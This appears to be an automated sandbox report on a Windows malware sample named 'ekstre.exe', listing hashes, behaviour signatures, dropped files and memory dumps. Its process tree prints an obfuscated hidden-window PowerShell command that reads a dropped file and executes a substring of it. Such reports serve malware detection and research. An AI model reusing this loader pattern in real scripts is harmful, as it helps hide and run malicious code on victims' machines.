Analysis

  • max time kernel
    92s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/02/2024, 13:06

General

  • Target

    ekstre.exe

  • Size

    704KB

  • MD5

    7817f076ff826896eea5d88826f1e0bf

  • SHA1

    0706b2ecec41fe1af96790fe82d0ea746134da2a

  • SHA256

    5806a9ff0ee5ef23fdb2d7cb9f12c3c0ab4b69b77eedf3aef2387672f8cce129

  • SHA512

    8463f80871e07d3fe2232c0f4c17ef8b4752073bf718d92f2c711ea9cc9ab93f352234a89530628712cf796d1a2ec3fd79fa95b681458c04b6646ff9bb8a0b75

  • SSDEEP

    12288:9cgybdNrgTB1myD5W3swba2cQxifyvYMaQyLi6R/LohEdIxL33vfy:9Sbd0PgDcYiqvYML3eU33Hy

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ekstre.exe
    "C:\Users\Admin\AppData\Local\Temp\ekstre.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Delplans=Get-Content 'C:\Users\Admin\AppData\Roaming\vivisectible\Nonmental216\Midrange\avlstyrenes\Malasapsap\Dagenes.Ful';$Pseudocoele=$Delplans.SubString(43226,3);.$Pseudocoele($Delplans)"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1156

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yw5jil2a.uwu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\nsr3D68.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b55f7f1b17c39018910c23108f929082

    SHA1

    1601f1cc0d0d6bcf35799b7cd15550cd01556172

    SHA256

    c4c6fe032f3cd8b31528d7b99661f85ee22cb78746aee98ec568431d4f5043f7

    SHA512

    d652f2b09396ef7b9181996c4700b25840ceaa6c1c10080a55ce3db4c25d8d85f00a21e747f9d14a3374be4cdd4ea829a18d7de9b27b13b5e304447f3e9268fa

  • C:\Users\Admin\AppData\Roaming\vivisectible\Nonmental216\Midrange\avlstyrenes\Malasapsap\Dagenes.Ful

    Filesize

    42KB

    MD5

    2fff737d32cd6ae12fd9f0f6eff695cc

    SHA1

    93006508926aedcc953721c6e32e5c3ef5518030

    SHA256

    4dd97bef5427d351886f28613e7bf046849f21c3b3f22b66a397e217594483e4

    SHA512

    53358f44ebce1ed85ef4fd20b28f569c7b3932daa75b56a58a379ebe7d9b962052c9747c4390908ea80a0d58165b3c43c7419ebbea0717744541aea3e13b058b

  • memory/1156-29-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

    Filesize

    3.3MB

  • memory/1156-31-0x00000000062E0000-0x000000000632C000-memory.dmp

    Filesize

    304KB

  • memory/1156-15-0x0000000002D90000-0x0000000002DA0000-memory.dmp

    Filesize

    64KB

  • memory/1156-17-0x0000000005AF0000-0x0000000005B12000-memory.dmp

    Filesize

    136KB

  • memory/1156-18-0x0000000005BC0000-0x0000000005C26000-memory.dmp

    Filesize

    408KB

  • memory/1156-19-0x0000000005C30000-0x0000000005C96000-memory.dmp

    Filesize

    408KB

  • memory/1156-14-0x0000000002D90000-0x0000000002DA0000-memory.dmp

    Filesize

    64KB

  • memory/1156-12-0x0000000002CB0000-0x0000000002CE6000-memory.dmp

    Filesize

    216KB

  • memory/1156-30-0x0000000006290000-0x00000000062AE000-memory.dmp

    Filesize

    120KB

  • memory/1156-16-0x0000000005410000-0x0000000005A38000-memory.dmp

    Filesize

    6.2MB

  • memory/1156-32-0x0000000007240000-0x00000000072D6000-memory.dmp

    Filesize

    600KB

  • memory/1156-33-0x00000000067D0000-0x00000000067EA000-memory.dmp

    Filesize

    104KB

  • memory/1156-34-0x0000000006820000-0x0000000006842000-memory.dmp

    Filesize

    136KB

  • memory/1156-35-0x00000000078F0000-0x0000000007E94000-memory.dmp

    Filesize

    5.6MB

  • memory/1156-13-0x0000000073ED0000-0x0000000074680000-memory.dmp

    Filesize

    7.7MB

  • memory/1156-37-0x0000000008520000-0x0000000008B9A000-memory.dmp

    Filesize

    6.5MB

  • memory/1156-39-0x0000000073ED0000-0x0000000074680000-memory.dmp

    Filesize

    7.7MB

  • memory/1156-40-0x0000000002D90000-0x0000000002DA0000-memory.dmp

    Filesize

    64KB

  • memory/1156-41-0x0000000002D90000-0x0000000002DA0000-memory.dmp

    Filesize

    64KB